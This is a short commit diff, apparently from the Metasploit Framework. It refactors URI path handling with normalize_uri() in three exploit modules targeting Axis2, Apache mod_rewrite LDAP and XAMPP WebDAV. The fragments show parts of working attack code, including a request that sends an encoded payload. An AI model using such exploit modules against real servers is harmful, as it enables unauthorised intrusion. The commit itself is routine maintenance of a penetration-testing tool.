Catch a few stragglers for double slash

HD Moore · HD Moore · commit 36066f8c7821 · 2012-11-08T07:21:37.000-06:00
diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb
@@ -259,11 +259,7 @@ def cleanup_instructions(rpath, name)
 	def exploit
 		user = datastore['USERNAME']
 		pass = datastore['PASSWORD']
-		rpath = datastore['PATH']
-		# ensure rpath has an initial /
-		if not rpath =~ /^\//
-			rpath = '/' + rpath
-		end
+		rpath = normalize_uri(datastore['PATH'])
 
 		success = false
 		srvhdr = '?'
diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
@@ -93,7 +93,7 @@ def exploit
 
 		print_status("Sending payload.")
 		send_request_raw({
-				'uri'     => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,
+				'uri'     => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,
 				'version' => '1.0',
 				}, 2)
 		handler
diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb
@@ -75,7 +75,7 @@ def build_path
 		if datastore['PATH'][0,1] == '/'
 			uri_path = datastore['PATH'].dup
 		else
-			uri_path = '/' + datastore['PATH'].dup
+			uri_path = normalize_uri(datastore['PATH'])
 		end
 		uri_path << '/' unless uri_path.ends_with?('/')
 		if datastore['FILENAME']
